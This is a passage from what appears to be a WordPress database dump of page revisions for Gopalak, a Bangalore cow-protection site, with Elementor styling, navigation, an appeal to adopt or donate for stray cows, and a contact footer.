con-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 18:22:29','2022-10-20 12:52:29','',1816,'https://gopalak.in/?p=1982',0,'revision','',0),(1983,1,'2022-10-20 18:22:30','2022-10-20 12:52:30','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 18:22:30','2022-10-20 12:52:30','',1816,'https://gopalak.in/?p=1983',0,'revision','',0),(1984,1,'2022-10-20 18:23:02','2022-10-20 12:53:02','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, 